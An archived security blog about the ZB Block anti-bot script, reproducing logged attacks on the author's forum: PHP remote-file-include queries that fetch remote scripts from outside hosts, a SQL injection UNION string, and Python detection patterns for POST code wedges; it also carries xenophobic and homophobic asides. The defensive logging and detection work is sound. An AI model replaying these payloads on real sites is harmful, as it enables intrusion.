Friday, July 23, 2010
MaMa CaSpEr and her clan of new hack-bots... and ZB Block's Response
Well, for months, ZB Block has been concentrating on the 'QUERY_STRING' that the hostile bots were sending websites. This used to be the only way that websites were hacked, and dare I say, we were effective enough to cause the attack bot script writers to jump to a new paradigm of attacks. The new attacks come through the 'HTTP_POST' subsystem. However, like a good general, my troops had in place a system to help combat this new vector; it just wasn't needed until now.
The new threat comes from a new family of bots. The first of this breed of bots, as far as I've been able to discern, is MaMa CaSpEr, followed by Casper, Dex, Kangen, kmccrew, Sasquia, Sledink, and plaNETWORK bots, plus many others yet to be found. The one defining factor is that they attempt to execute instructions by breaking the http_post variable input system. This is done with execution wedges, either through direct "<?php (code) ?>", bbcode "[php] (code) [/php]", or, oddly enough, XML "<methodCall>" execution wedging. In every case, they try to slip it in through scripts that use the once unexploited HTTP_POST vector.
Well, I guess it's now the new frontier of malicious web robot exploitation, and I hope to be here to fight it. I could remind people that sanitization of variables is the most important way to fight this plague, but no matter how hard they try to harden their scripts, the skiddies always find a way around it. All I can say to them is, together, we may be able to effectively fight this. You might try suggesting to your users that they add ZB Block to their scripts. And to you end-users out there, your script writer tried hard to avoid these problems; together, we can be much stronger.
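The check the post is describing, as an added example that is not ZB Block's own code: decode each field of a urlencoded POST body and look for the three wedge shapes. It assumes an application/x-www-form-urlencoded body and that an XML-RPC endpoint can be recognized by a path ending in xmlrpc.php; both are assumptions of the example.

```python
"""Scan a urlencoded POST body for the execution wedges described above."""
import re
from urllib.parse import parse_qs, unquote

# The three wedge shapes named in the post.  The PHP pattern accepts "<?php"
# and the short echo tag "<?=" but deliberately not "<?xml", so an XML prolog
# pasted into a legitimate field does not fire.
WEDGE_PATTERNS = {
    "php_tag": re.compile(r"<\?(?:php\b|=)", re.IGNORECASE),
    "bbcode_php": re.compile(r"\[php\]", re.IGNORECASE),
    "xmlrpc_methodcall": re.compile(r"<\s*methodCall\b", re.IGNORECASE),
}

MAX_DECODE_ROUNDS = 3  # %253C -> %3C -> '<' ; stop once a round changes nothing


def normalize(value: str) -> str:
    """Undo repeated percent-encoding so an encoded wedge is seen in the clear."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_post_body(body: str, path: str = "/") -> list:
    """Return [(field, wedge)] for every wedge found in the POST body.

    `path` is the request path.  A <methodCall> document POSTed to an XML-RPC
    endpoint is what that endpoint exists for, so that wedge is skipped there.
    Assumption for this example: the endpoint's path ends in xmlrpc.php.
    """
    is_xmlrpc = path.lower().endswith("xmlrpc.php")
    hits = []
    # parse_qs decodes one layer and handles '+'; normalize() peels any extra layers.
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            text = normalize(raw)
            for wedge, pattern in WEDGE_PATTERNS.items():
                if wedge == "xmlrpc_methodcall" and is_xmlrpc:
                    continue
                if pattern.search(text):
                    hits.append((field, wedge))
    return hits


if __name__ == "__main__":
    # Constructed sample bodies: one clean guestbook post, one carrying a PHP wedge.
    for body in ("subject=Hello&message=I+love+%3Cb%3Ewidgets%3C%2Fb%3E",
                 "message=%3C%3Fphp+%28code%29+%3F%3E"):
        print(body, "->", scan_post_body(body, "/guestbook.php") or "clean")
```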
And to the skript kiddies, and the hackers programming the scripts that are attacking us, just remember our motto...
“Evinco, est pergo bellum!”
"To
conquer, is to continue the war!"
Zap :)
Edited on: Friday, July 30, 2010 2:50 PM Mountain Daylight Time
Categories: Bad User Client, Exploit Bot, Scan Bot, Security Musings, Stupid Bot
Tuesday, October 27, 2009
China Told to Get Lost... Again.
Yep, I tried being nice. I let China/Korea have access to my site again, just in case some poor sot there was running a board and was in spam hell.
Well, lesson learned: all it did was attract low class script kiddies, skript kiddies, or skiddies, whatever you want to call them. And lo, when they saw ZB Block was impenetrable by their lame attacks, they decided to start an http_referer spam campaign against my site, usually from homosexual pornographic sites. This is designed to hurt Google PageRank and other indicators of a site's quality. Never once did I see a valid, interested access from China. Never once did they get through my protections.
But they annoyed the hell out of me.
It's funny how the infamous Great Firewall of China stops normal good folks from using the web, yet seems to be assisting organized crime in attacking the rest of the internet. Sounds like someone is buddy-buddy "heh-heh" getting their pockets lined by the Russian Business Network to open the floodgates of spam. Imagine that, many people going against their beloved Mao Zedong's party, and co-operating with the Russians to the detriment of his people, his party, and his state. What is worse is, the same attacks and spam were coming out of Korea too; this means that "Beloved Leader" Kim Jong-il's people are stabbing him in the back too. Just shows you how two-faced communists are, no matter their stripe.
Well, lesson learned. The blocks are back in, and the ZB Block IP banlist for Chinese / Korean IPs has been updated, thanks to the lists Okean provides. Just paste them into the appropriate area of your customsig.inc to turn off China and Korea like a switch.
It's too bad I had to resort to this, but it's a lesson learned.
Zap.
Categories: Bad User Client, Exploit Bot, Spam Bot, Stupid Bot
Monday, July 13, 2009
ZB Block Racks Up More Bot and Script Virus Kills!
Well, Avira has gotten back to me, and it looks like I have found some viral gold they can add to their arsenal for all of us.
Here's a run-down of the fresh kills I have added to ZB Block's (custom in-house version w/ probe trap) record. Please note that ZB Block caused "natural" immunity to all attacks attempting to install these. So do the wise thing and go to http://www.spambotsecurity.com/zbblock.php and get protected.
#1
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
A listing of files alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25394824 | Bildb | 2.03 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| Bildb | MALWARE |
The file 'Bildb' has been determined to be 'MALWARE'. Our analysts named the threat BDS/PHP.ali.31. The term "BDS/" denotes a Backdoor-Server program. Backdoor-Server programs are used to spy out, modify or delete data. Detection is added to our virus definition file (VDF) starting with version 7.01.04.223.
#2
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
A listing of files alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25394829 | dudul3.txt | 40.88 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| dudul3.txt | MALWARE |
The file 'dudul3.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.2. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
#3
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
A listing of files alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25394826 | bot_ping.txt | 100.52 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| bot_ping.txt | MALWARE |
The file 'bot_ping.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP.IrcBot.nad. Detection will be added to our virus definition file (VDF) with one of the next updates.
#4
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
A listing of files alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25394836 | spread.txt | 19.34 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| spread.txt | MALWARE |
The file 'spread.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.6. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
#5
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
We received the following archive files:
| File ID | Filename | Size (Byte) | Result |
| 25395810 | feelcomz 1.7 bot.zip | 12.06 KB | OK |
A listing of files contained inside archives alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25395811 | botphp.txt | 48.89 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| botphp.txt | MALWARE |
The file 'botphp.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.7. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
#6 & 7
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
We received the following archive files:
| File ID | Filename | Size (Byte) | Result |
| 25395813 | One attack from t...ts.zip | 23.89 KB | OK |
A listing of files contained inside archives alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25395814 | pbota.txt | 27.42 KB | MALWARE |
| 25395815 | pbotb.txt | 27.39 KB | MALWARE |
| 25395816 | pbotc.txt | 27.72 KB | MALWARE |
| 25395817 | pbotd.txt | 27.73 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
| Filename | Result |
| pbota.txt | MALWARE |
The file 'pbota.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.3. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
| Filename | Result |
| pbotb.txt | MALWARE |
The file 'pbotb.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
| Filename | Result |
| pbotc.txt | MALWARE |
The file 'pbotc.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
| Filename | Result |
| pbotd.txt | MALWARE |
The file 'pbotd.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term "PHP/" denotes a PHP scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.
Sweetness I tell you. Nothing feels better than being the shiv in the dark that takes some of this crap off the virtual streets. Real hackers don't use scripts... they may write them, but they don't use them. (Ever wonder if your pre-made script isn't designed to take away your toys eventually, eh skiddy?)
If you want to see the places these were injected, well, where they were attempted to be injected, just pore over the killed_log.txt files shared with the public on ZB Block's page.
Most will be there. Some won't.
Where are the others? Other servers!
Where are the other servers? Wouldn't you like to know!
Zap!
Categories: Bad User Client, Exploit Bot, Scan Bot, Security Musings, Spam Bot, Stupid Bot
A little bird told me about an aviary.com full of poopy pigeons.
"But there's one thing that makes spring
complete for me,
And makes ev'ry Sunday a treat for me.
All
the world seems in tune
On a spring afternoon,
When we're
poisoning pigeons in the park.
Ev'ry Sunday you'll see
My
sweetheart and me,
As we poison the pigeons in the park." -
Tom Lehrer
Okay, to start this story, I have to give proper credit to Amber MacArthur and her netcast on TWiT.tv. She's the little bird that told me about a big nasty pigeon ready to poop on my site, and yours, just the way tynted does. No, I have not had a chance to listen to the show, but the notes gave me all the "beef" I needed.
The pigeon's name is Aviary.com. It's another content scraper / content thief that also allows an attacker to send a malicious request to your machine, both from the AmazonAWS cloud (already protected against) and the newly killed pwebtech / FortressITX spamhost. Modus operandi? Same as tynt.com, that being content theft and acting as an unregulated proxy for hackers.
Here is the first screenshot I wish to share with you, taken after establishing that Aviary.com is operating out of multiple netblocks. What you see is a shot of the aviary.com site loading my site into their "screenshot". But, by the tests below, you can see it passes queries through just fine, meaning any exploit out there could have been run through them as an unregulated proxy server. The method used to send this query was http://aviary.com/http://www.spambotsecurity.com/?xtestx . As you can see, it bounced the AmazonAWS perfectly, and caught the trigger.
And here is the block that it generated.
#: 6896 @: Mon, 13 Jul 2009 11:48:48 -0600
Host: ec2-174-129-94-22.compute-1.amazonaws.com
IP: 174.129.94.22
Score: 1
Why blocked: Amazon Web Services. Not an ISP. Used by hackers, Keyword spamming SEO bots, and other unsavories. Checked for bypass.
Query: xtextx
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; Data Center; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http:// www.spambotsecurity.com /?xtextx
Yet another probe of Aviary.com after addition of the new spamhost (pwebtech/FortressITX). Please note that now it is pulling from viary.com! Viary.com is, like Aviary.com, hosted on the same ridin' dirty webhost. You can see, however, this time it choked. But, it still did actually hit my site. Here's the blocked request. Please note it is using random user agents to try to cloak itself. This is EXCEEDINGLY bad, and very suspicious behavior.
#: 6899 @: Mon, 13 Jul 2009 12:32:21 -0600
Host: 65.98.13.118
IP: 65.98.13.118
Score: 2
Why blocked: pwebtech/FortressITX spam-friendly host/aviary.com unregulated proxy service. Test Trigger to test function.
Query: xtestx4
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http:// www.spambotsecurity.com /?xtestx4
I also used their services, if they check their logs, to send them a "you've been bad, so here's the scoop, all you get for Christmas is snowman poop!" message. And, here's the logging of that hit. (Which actually came before the previous image, but cemented FortressITX / pwebtech's doom.)
#: 6897 @: Mon, 13 Jul 2009 11:51:10 -0600
Host: 65.98.13.118
IP: 65.98.13.118
Score: 1
Why blocked: Test Trigger to test function.
Query: xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http:// www.spambotsecurity.com /?xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block
I would be remiss if I didn't mention IncrediBILL's Random Rants, his pages first turned me onto a good description of this kind of problem. (Also, previous logs were showing hacking attempts from tynt.com / tynted.net).
Zap!
Categories: Bad User Client, Content Thieves, Security Musings
Friday, June 26, 2009
Booyeah! Nailed one to the wall! Scratch one bot variant.
I gots me a trophy!
*** BEGIN MESSAGE ***
Dear Sir or Madam,
Thank you for your email to Avira's virus lab.
Tracking number: (REMOVED).
A listing of files alongside their results can be found below:
| File ID | Filename | Size (Byte) | Result |
| 25382358 | mucil_idle.txt | 39.07 KB | MALWARE |
Please find a detailed report concerning each individual sample below:
The file 'mucil_idle.txt' has been determined to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.F. The term "PHP/" denotes a PHP scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
Alternatively you can see the analysis result here:
http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED)
An overview of all your submissions can be found here:
http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED)
Please note: If you have specific questions please address them to support@avira.com
Kind regards
Avira Virus Lab
*** END OF MESSAGE ***
Interesting things happen when I modify a version of ZB Block on another site to return a false success to a scanning probe... like actually taking some scum off the streets, rather than just stopping the attack their probes were trying.
I hereby declare PHP/IrcBot.F to be my first kill, in what I hope to be a string of many! And to those who might not like this news, all I can say is, you knew it was coming.
Zap!
P.S. I might also mention here, that those of you running ZB Block were naturally immune to this infection vector. My modification just had to do with modifying the output of ZB Block to cause the virus to think it had found an infectable machine, by returning the proper code to it.
Categories: Bad User Client, Exploit Bot, Scan Bot, Security Musings, Spam Bot, Stupid Bot
Wednesday, April 15, 2009
PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.
Remember what I said about how no one notices the robber casing the joint, but everyone notices when he's committing / has committed the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their host, dedibox.fr, which is more than willing to share IP space?
Witness if you will, a vengeance script attack on a well defended website with two doors, and the results that are gleaned when a quick minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but a grim reminder that they have stepped into... The Toilet Zone.
#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Then again:
#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Changing method to:
#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Oh no, not again, just 2 this time...
#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
and...
#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Now I know that none of these attacks came from laycat.com, aceleo.com, or kyklo.com addresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.
Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block handled it with grace, and did as it was supposed to.
All in all, it looks like I caught me a weasel in the hen house. dedibox.fr is now attacksville forever, and I suggest that, whatever method of blocking your site uses, you ban the domain dedibox.fr until I see some good reason that their server needs to surf your site.
Categories: Exploit Bot, RBN
Saturday, April 11, 2009
Blocking the *.amazonaws.com domain with ZB Block, and why.
This domain has been a continual source of content theft and hacking attempts.
Now first, I must admit that I have seen a couple good services using a *.amazonaws.com domain name, but all of the domain names are cryptic, and you just can't be sure you aren't dealing with a spoofed user client string. Now onto some finds!
Tynted
Host: ec2-67-202-60-246.compute-1.amazonaws.com
User Agent: Java/1.6.0_02
Here's the most egregious of the lot, tynt.com. This site claims straight out that it's copying the content of your site. Who da #&*%! gave them that right, especially when I claim copyright? Also, they will cause duplicate content to appear on the web, and in the eyes of google, this messes up your page rank, badly! But, that's not the worst thing...
EVEN WORSE tynt.com / tynted.net act as a no-registration-required proxy server! This allows previously blocked hackers, to come right back in and start pushing, pulling, tweaking, and investigating your site. This bad behaviour was the genesis of me blocking them. This by itself is bad, but wait, there's MORE...
REDIFF
Host: ec2-72-44-45-196.compute-1.amazonaws.com
User Agent: rdfbot/1.0 (Indian Language Web Search Engine; Rediff.com; rdfbotsupport AT rediffmailpro DOT com)
I don't speak Hindi, sir! This is actually a content scraper, and their site seemed to be in English.
SimilarPages
Host: ec2-174-129-187-47.compute-1.amazonaws.com
User Agent: SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)
If this isn't saying "Hi, I'm an SEO scraper!" I don't know what it's saying. Buhbyenow. Usually Nutch is used by scrapers.
Conductor
Host: ec2-72-44-52-94.compute-1.amazonaws.com
User Agent: Caliperbot/1.0 (+http://www.conductor.com/caliperbot)
They say (here): "Perfect ads are only possible when the publisher retains 100% editorial control over content and advertising. It's possible with Conductor. If interested, first review our publisher requirements and then submit your site for review."
I say: "I never submitted my site for review, so why are you here? I use, and am happy with adsense."
They say (here): "So if you can compete with those other articles, other competitors, those other affiliates and aggregators that are in front of you - you can discover millions of dollars of revenue every year - without even taking into consideration brand value or the synergy that results when you appear on the first page in both paid and natural search."
I say: "So you're really keyword spamming SEO scum. Get lost. My site is high ranked for content, not stolen words."
***
I am sure there will be more as time goes on. The next version of ZB Block's signatures should have bypasses for the valid bots (currently under test), but for now, the AmazonAWS cloud is banned.
Zap.
UPDATE: The bypasses are in. Amazon AWS can be blocked from your site with impunity, without harming any valid search engines.
Edited on: Tuesday, June 02, 2009 3:07 PM Mountain Daylight Time
Categories: Content Thieves, Odd Bot, Scrape Bot
Wednesday, April 08, 2009
Stop Keyword Poaching - It's mutiny on your bounty!
You may notice that now ZB Block is blocking SEO keyword scrapers. You may ask just what they are, and why I am directing your site to block it. Well, I will do my best to fill you in on the scoop.
First off, no keyword scraping SEO robot ever drove traffic to YOUR site. Quite the opposite: they attempt to tear traffic away from your site. Worse, they try to do this by fooling the legitimate search engines, and they make money in the process. Even beyond this, some of these are known to feed the Russian Business Network (a giant cybercrime conglomerate). The RBN is interested in this so they can make bogus pages (especially security related) that have high page ranks, to lure those with legitimate interest away to pages with bogus scam software (like the very evil AntiVirusPro XP 2010, otherwise known as Troj/FakeXPA).
Let's use a probable hypothetical example, one that happens far too often, to describe this:
*John, an expert in the field of wonder widgets, decides to share his knowledge with the world on the best way to care for and maintain wonder widgets. He works long and hard on a site describing how to do this, and even how you can make your own wonder widget if you can't afford to buy one. His site is very informative, and well written, and the great google gods decide to give him a good page rank as an award for his hard labor.
The SEO botmasters notice his up and coming star, and decide to scrape his site for keyword content, and build a profile of his site.
Then, Gidget's Gadgets notices that their business is failing a little, and hires a SEO firm to find out why. The SEO firm compares keywords in her site, to known profiles of other sites, and finds that John's site, and wonder widgets, have a lot in common with the gadgets that Gidget sells. Not caring that they aren't the same product, and each one fills a different, but related niche, they then sell the keywords that John has, to Gidget. Gidget adds these keywords into her site, and her page rank goes up a bit on these words, and John's pagerank gets diluted.
Now John's visits drop, and people are no longer getting helped. Gidget's site gets much more traffic, but she isn't making sales, because people really want wonder widgets, and her drop in sales was due to market saturation of gadgets, not a competing site. Now no one is happy... except the SEO company that has Gidget's money.*
This sort of behavior is in the realm of keyword spamming; it helps no one. Keyword spam turns the internet into a sargassosistic morass of false leads generated by tricked search engines, which just causes more traffic overload, and more confused and frustrated innocent victims.
Someday, search engines may find a way to stop this, but for now, and until the expiration of P.T. Barnum's Maxim "You can fool all of the people some of the time, some of the people all of the time, but not all of the people all of the time.", and until the invention of decent AI, keyword spam will be a threat. Your best defense is to send the SEO bots packing with something like ZB Block, while welcoming legitimate search bots with open arms.
~Zaphod
P.S. Thanks WY G&F for a title idea. To be honest, it fits!
Edited on: Friday, May 22, 2009 12:27 PM Mountain Daylight Time
Categories: Content Thieves, Scrape Bot, Spam Bot
Monday, March 30, 2009
Guess who?
Look who ignored robots.txt again after a couple of weeks.
#: 479 @: Mon, 30 Mar 2009 09:20:47 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/
So it's obviously not caching robots.txt, and having problems with it propagating to the scanners as they have claimed in an e-mail.
So now they are permanently §Hîtlisted as being part of the Russian Business Network. I have no doubts now... Oh wait, they might say that one was before they pulled robots.txt... but explain this one you a§§holes, over 2 hours later, and FAKING a http_referer from a protected page no less...
#: 482 @: Mon, 30 Mar 2009 11:42:48 -0600
Host: laycat.com
IP: 88.191.79.43
Score: 1
Why blocked: Exploit probe? Possibly RBN? Claims to be search engine in dev. No 3rd party info on this. Ignores robots.txt.
File: removed for security
Post:
Query:
Referer: http://www.spambotsecurity.com/
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Reconstructed URL: http://www.spambotsecurity.com/zbblock.php
Oh, and btw, the same group of nogoodniks just slammed my friend's site for 100s of page pulls, in violation of robots.txt too. She's P.O.ed! Hell hath no wrath like a woman's robots.txt scorned.
Welcome to being labelled as pure RBN trash in my blocklists.
EDIT: I might also mention here, that laycat, kyklo, aceleo, and dedibox are now all blocked by ZB Block which can be downloaded for free here.
Zaphod "Some Heads are Gonna Roll" Breeblebrox
Edited on: Wednesday, April 01, 2009 12:01 AM Mountain Daylight Time
Categories: Exploit Bot, RBN, Scan Bot, Stupid Bot
Wednesday, March 25, 2009
Definite New MySQL attack through phpBB2 and possibly other CMS. ZB Block defends.
Well, just when you think life is boring, some aspiring skript kiddie tries a new attack! This one affects MySQL and was attempted against a phpBB2 board. I feel that this attack is probably damaging to any board, and perhaps even CMS systems.
This is a serious situation, and did require an update to the signatures in ZB Block. Here is what the new attack looked like...
#: 5437 @: Tue, 24 Mar 2009 21:10:16 -0600
Host: mail.tmanshost.com
IP: 207.44.178.47
Score: 2
Why blocked: MySQL attack. Mail server, usually infected. Please access from a regular domain name.
File: removed for security
Post:
Query: p=-1/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/0x30653763326137383538643038336566366365353233373433305317531753175317/*
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http://zaphodb777.dyndns.org/forum/viewtopic.php?p=-1/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/0x30653763326137383538643038336566366365353233373433305317531753175317/*
Don't worry, that version has been neutered. It appears to be a self-propagating worm, with several attack sequences, most much longer, attempting multiple injections into your MySQL db. ZB Block caught it on just 1 variable, and in smarter hands, would have missed it, and I would have been exploited.
Things the new attack has in common...
- Uses a negative page number (probably to pop execution at a specified/known/expected place in the script.)
- Uses "/**/" for blind concatenation of strings. The older attacks used "+".
- Has a "/*" trailing at the end of query.
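As an added example that is not ZB Block's code, the following scores a QUERY_STRING with signatures reconstructed from the reasons logged in the dedibox.fr post above ("[a] does not belong in query", the unescaped question mark, the remote file include) and the three traits listed here. The allow-list of board parameters, the sample queries (payload host replaced with example.invalid, sid shortened) and the one-point-per-signature scoring are constructed for the example; the repeated percent-decoding is what keeps the %2527 retries in that log from slipping past.

```python
"""Score a QUERY_STRING with signatures reconstructed from the logged attacks."""
import re
from urllib.parse import parse_qsl, unquote

# Parameters the board's viewtopic/posting scripts are expected to accept.
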